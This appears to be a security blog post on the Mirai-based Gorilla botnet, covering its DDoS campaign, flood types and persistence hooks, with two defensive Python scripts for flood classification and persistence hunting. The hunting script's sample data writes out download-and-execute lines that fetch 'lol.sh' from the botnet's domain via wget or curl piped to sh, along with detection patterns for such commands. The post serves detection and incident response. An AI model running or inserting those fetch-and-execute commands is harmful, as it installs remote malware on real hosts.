300,000+ DDoS Attacks in 100 Countries: The Reach of Gorilla Botnet

Just a SOC Analyst ^^
Cybersecurity researchers have discovered a new botnet malware family named Gorilla (also known as GorillaBot), built from the leaked Mirai botnet source code.
General Summary
Gorilla Botnet, a new variant built on the Mirai source code, launched over 300,000 distributed denial-of-service (DDoS) attacks across more than 100 countries in September 2024. The botnet targeted government organizations, telecommunications providers, banks, and online gaming services. The aim of the attacks was to disrupt network services, and they had a significant impact on digital infrastructure in many countries.
Gorilla Botnet emerged after the source code of the infamous Mirai botnet was leaked. It extends Mirai with additional attack methods and recruits new bots by exploiting security vulnerabilities in servers and IoT (Internet of Things) devices. Its DDoS attacks primarily targeted network infrastructure, crippling the services of many organizations and businesses.
Impact of the Attack
The Gorilla Botnet campaign caused significant global disruption, with key targets including government organizations, financial services, and telecommunications. NSFOCUS, the cybersecurity company that discovered this activity last month, stated that the botnet "conducted over 300,000 attacks, with an astonishing attack density" from September 4 to September 27, 2024. On average, the botnet issued no fewer than 20,000 attack commands per day to carry out distributed denial-of-service (DDoS) attacks.
Many companies and organizations in countries such as China, the United States, Canada, Germany, and others faced severe disruptions in their business operations.
The banking and financial sectors were heavily impacted, as online services were repeatedly unavailable and customer transactions were disrupted. Telecommunications services were also interrupted, making it difficult for affected operators to maintain communication.
Technical Details
Gorilla Botnet supports a range of DDoS attack methods. In the observed campaign the most used were UDP flood (41% of attacks), ACK bypass flood (24%), and Valve Source Engine (VSE) flood (12%). These methods generate large volumes of junk or spoofed traffic that exhaust the target's bandwidth or connection-handling capacity and take its services offline; because UDP is connectionless, UDP-based floods are easy to launch with spoofed source addresses, which is one reason they dominate the mix. Notably, Gorilla also exploits a vulnerability in Apache Hadoop YARN RPC to achieve remote code execution: a YARN ResourceManager exposed without authentication accepts application submissions from anyone, which lets the attacker run arbitrary commands on the cluster and enlist large servers as bots without any interaction from the victim. Hadoop clusters whose YARN endpoints are reachable from the internet should be treated as exposed.
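The breakdown above is by attack type, and a SOC can produce the same kind of breakdown from its own traffic. The following classifier is an added example (not code from NSFOCUS, FPT, or the malware): it labels packet records as UDP, VSE, ACK, or SYN flood traffic, counts them per source/destination pair in fixed time windows, and alerts when a pair exceeds a packet-rate threshold. The VSE signature is the real A2S_INFO query payload that Source Engine servers answer; the packet records, addresses, and the 100 pkt/s threshold are constructed for the demo.

```python
"""Flow classifier for the flood types in the Gorilla attack mix.

Added example, not code from NSFOCUS or from the malware. Packet records
and thresholds are constructed for illustration.
"""
from collections import Counter
from dataclasses import dataclass

# A2S_INFO request used by Valve Source Engine game servers. A VSE flood is a
# high-rate stream of these UDP payloads, so the payload itself is the signature.
VSE_QUERY = b"\xff\xff\xff\xffTSource Engine Query\x00"


@dataclass(frozen=True)
class Packet:
    ts: float            # seconds since capture start
    src: str
    dst: str
    proto: str           # "udp" or "tcp"
    flags: str = ""      # TCP flags as letters, e.g. "S", "A", "PA"
    payload: bytes = b""


def label(p: Packet):
    """Map one packet to the flood type it could belong to, or None."""
    if p.proto == "udp":
        return "vse_flood" if p.payload == VSE_QUERY else "udp_flood"
    if p.proto == "tcp":
        if p.flags == "S":
            return "syn_flood"
        # Mirai's "ACK bypass" flood sends bare ACKs that look like traffic of an
        # established session. Statelessly we can only count them, so the rate
        # threshold in classify() does the real work.
        if p.flags == "A":
            return "ack_flood"
    return None


def classify(packets, window=1.0, pps_threshold=100):
    """Count packets per (src, dst, type) in fixed time windows and return
    {(src, dst, type): peak_count} for pairs that reach pps_threshold in
    at least one window."""
    buckets = Counter()
    for p in packets:
        kind = label(p)
        if kind is not None:
            buckets[(p.src, p.dst, kind, int(p.ts // window))] += 1
    alerts = {}
    for (src, dst, kind, _), n in buckets.items():
        if n >= pps_threshold:
            key = (src, dst, kind)
            alerts[key] = max(n, alerts.get(key, 0))
    return alerts


def attack_mix(packets):
    """Packet count per flood type, the same breakdown NSFOCUS reported as
    percentages (UDP 41%, ACK bypass 24%, VSE 12%)."""
    return Counter(k for k in map(label, packets) if k is not None)


def build_sample():
    """Constructed traffic, not a real capture: one VSE flood source, one
    bare-ACK flood source, and a low-rate UDP client that must not alert."""
    pkts = []
    for i in range(150):
        pkts.append(Packet(0.001 * i, "10.0.0.5", "203.0.113.10", "udp", payload=VSE_QUERY))
    for i in range(150):
        pkts.append(Packet(0.001 * i, "10.0.0.6", "203.0.113.10", "tcp", flags="A"))
    for i in range(5):
        pkts.append(Packet(0.1 * i, "10.0.0.7", "203.0.113.10", "udp", payload=b"\x12\x34\x01\x00"))
    return pkts


if __name__ == "__main__":
    for (src, dst, kind), n in sorted(classify(build_sample()).items()):
        print(f"{kind:10s} {src} -> {dst} peak {n} pkt/s")
```

On real data, feed `Packet` records parsed from a pcap or from NetFlow/IPFIX export. The ACK flood label is deliberately weak on its own: bare ACKs are normal inside established sessions, so in production the count should be restricted to ACKs that match no connection in the state table, which is exactly what the "bypass" in ACK bypass flood tries to defeat.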
Additionally, the botnet persists on compromised servers by creating a systemd unit file named custom.service in the /etc/systemd/system/ directory and enabling it so that it runs at every boot.
The service downloads and executes a shell script ("lol.sh") from a remote server ("pen.gorillafirewall[.]su"). Equivalent download-and-execute commands are also added to /etc/inittab, /etc/profile, and /boot/bootcmd, so the script runs again at system start (inittab, bootcmd) or whenever a user logs in (profile). All four locations should be checked during incident response: removing only the systemd unit leaves the other three hooks in place and the host is re-infected on the next boot or login.
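A quick way to check a host for the persistence hooks described above is to scan the four locations for the published indicators and, more generally, for any line that downloads something and immediately runs it. The script below is an added example, not tooling from NSFOCUS or FPT. The contents of `SAMPLE_FILES` are constructed for the demo (the page does not publish the actual unit file or command lines), and the IOC domain is written in its real, undefanged form so that string matching works.

```python
"""Hunt for the Gorilla persistence hooks described above.

Added example, not tooling from NSFOCUS or FPT. The file contents in
SAMPLE_FILES are constructed for the demo; the real unit file and
commands were not published on this page.
"""
import glob
import os
import re

# IOCs from the text; the page writes the domain defanged as pen.gorillafirewall[.]su.
IOC_DOMAIN = "pen.gorillafirewall.su"
IOC_SCRIPT = "lol.sh"
SYSTEMD_UNIT = "/etc/systemd/system/custom.service"
HOOK_FILES = ("/etc/inittab", "/etc/profile", "/boot/bootcmd")

# A downloader on the same line as something that runs what it fetched.
DOWNLOADER = re.compile(r"\b(wget|curl|tftp)\b")
EXEC_AFTER = re.compile(r"\|\s*(sh|bash)\b|(;|&&)\s*(sh|bash|\./)|chmod\s+\+x")


def scan(files):
    """files: {path: text}. Returns [(path, lineno, reasons, line)] for every
    non-comment line that matches an IOC, a download-and-execute pattern, or
    is the ExecStart of the custom.service unit."""
    findings = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), 1):
            s = line.strip()
            if not s or s.startswith("#"):
                continue
            reasons = []
            if IOC_DOMAIN in s:
                reasons.append("ioc_domain")
            if IOC_SCRIPT in s:
                reasons.append("ioc_script")
            if DOWNLOADER.search(s) and EXEC_AFTER.search(s):
                reasons.append("download_exec")
            if path == SYSTEMD_UNIT and s.startswith("ExecStart="):
                reasons.append("custom_service_execstart")
            if reasons:
                findings.append((path, lineno, tuple(reasons), s))
    return findings


def load_from_disk():
    """Read the hook files and every unit in /etc/systemd/system that exist
    on this host (some need root to read)."""
    paths = list(HOOK_FILES) + glob.glob("/etc/systemd/system/*.service")
    files = {}
    for p in paths:
        if os.path.isfile(p):
            with open(p, errors="replace") as fh:
                files[p] = fh.read()
    return files


SAMPLE_FILES = {  # constructed for the example, not recovered from the malware
    SYSTEMD_UNIT: (
        "[Unit]\nDescription=custom\n"
        "[Service]\nType=simple\n"
        "ExecStart=/bin/sh -c 'wget http://pen.gorillafirewall.su/lol.sh -O- | sh'\n"
        "[Install]\nWantedBy=multi-user.target\n"
    ),
    "/etc/profile": "export PATH=$PATH:/usr/local/bin\n"
                    "curl -s http://pen.gorillafirewall.su/lol.sh | sh\n",
    "/etc/inittab": "id:3:initdefault:\n",
    "/boot/bootcmd": "wget http://pen.gorillafirewall.su/lol.sh -O /tmp/lol.sh; sh /tmp/lol.sh\n",
    "/etc/systemd/system/sshd.service": "[Service]\nExecStart=/usr/sbin/sshd -D\n",
    "/root/.bashrc": "alias dl='wget -q'\n",  # downloader with no execution: must not fire
}


if __name__ == "__main__":
    for path, lineno, reasons, line in scan(SAMPLE_FILES):
        print(f"{path}:{lineno} {','.join(reasons)}: {line}")
```

On a suspect host run `scan(load_from_disk())`. A hit carrying only `custom_service_execstart` means a unit with that name exists, which is suspicious but not proof on its own; a line carrying `download_exec` is worth reading regardless of whether the Gorilla domain appears, since the operators can change the download host without changing the persistence technique.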
Recommendations
FPT Threat Intelligence recommends the following measures for organizations and individuals to reduce the impact of DDoS attacks:
Use firewalls: Network firewalls and access control lists can drop traffic the service does not need (for example, UDP to ports that host nothing) before it reaches the server. They do not help once the attack saturates the upstream link, so they complement rather than replace the measures below.
Use Content Delivery Networks (CDN): A CDN absorbs and distributes traffic across many edge nodes and hides the origin's address, reducing the load that reaches the origin server.
Limit rates and filter traffic: Per-source connection and packet-rate limits, together with filtering of invalid packets (for example, bare ACKs that belong to no established connection, as used by the ACK bypass flood), reduce the effect of flood traffic.
Use cloud DDoS mitigation: Cloud scrubbing services can monitor, detect, and absorb volumetric attacks that exceed an organization's own bandwidth and filtering capacity.
Mitigate with Captcha or authentication: Applying a challenge or authentication to access requests reduces automated application-layer traffic from bots. This only helps against HTTP-level attacks; it does nothing against the UDP, VSE, and ACK floods that make up most of Gorilla's traffic, which have to be handled at the network layer.